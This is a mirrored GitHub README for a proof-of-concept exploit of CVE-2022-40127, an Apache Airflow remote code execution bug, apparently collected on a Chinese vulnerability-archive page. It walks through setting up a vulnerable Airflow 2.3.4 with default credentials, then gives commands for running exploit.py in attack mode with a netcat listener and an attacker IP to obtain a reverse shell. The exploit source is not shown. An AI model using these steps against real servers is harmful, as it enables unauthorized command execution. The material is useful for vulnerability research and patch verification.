关联漏洞
标题:
Apache Airflow 代码注入漏洞
(CVE-2022-40127)
描述:Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 Apache Airflow存在代码注入漏洞,该漏洞源于其Example Dags允许具有UI访问权限的攻击者触发DAGs,通过手动提供run_id参数执行任意命令。
描述
CVE-2022-40127 PoC and exploit
介绍
# Apache Airflow < 2.4.0 RCE (CVE-2022-40127)
**PoC for CVE-2022-40127 that is an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.**
The <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40127" target="_blank">official report description</a> says:
> A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
The repo is created for a CVE analysis blog post available on <a href="https://www.vicarius.io/vsociety/" target="_blank">vsociety blog</a>.
https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6
## Usage
You can clone the repo:
```bash
git clone https://github.com/jakabakos/CVE-2022-40127.git
```
## Install and run Airflow v2.3.4
### Via docker-compose
Download the docker-compose file from the official repo
```bash
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```
Run Airflow
```bash
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
```
In this case both the username and password will be `airflow`.
### Manually
Based on the <a href="https://airflow.apache.org/docs/apache-airflow/2.3.4/installation/installing-from-pypi.html" target="_blank">official install instructions</a>:
```bash
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
```
You can verify if the installation was successful with commands `which airflow` and/or `airflow info`.
Run Airflow
```bash
airflow standalone
```
See the generated password and username in the logs.
## Using the exploit
First, install the required packeges with pip:
```bash
pip3 install -r requirements.txt
```
See the possible options with:
```bash
python3 exploit.py --help
```
You can check if the host can be exploited or not:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```
Set up a local listener for the reverse shell in a different terminal session:
```bash
nc -lvnp 4242
```
Run the script in attack mode with this command:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```
You should see the connection within a minute or so.
<img width="1549" alt="proof" src="https://github.com/jakabakos/CVE-2022-40127/assets/42498816/a80ff9ec-69a1-4b99-91ea-c244098ded80">
文件快照
[4.0K] /data/pocs/d6ab31e156c6b3ae34db80606a6d58385b5a184d
├── [6.0K] exploit.py
├── [4.0K] proofs
│ ├── [234K] flowchart.png
│ ├── [6.0M] proof.mp4
│ └── [380K] proof.png
├── [2.6K] README.md
└── [ 27] requirements.txt
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。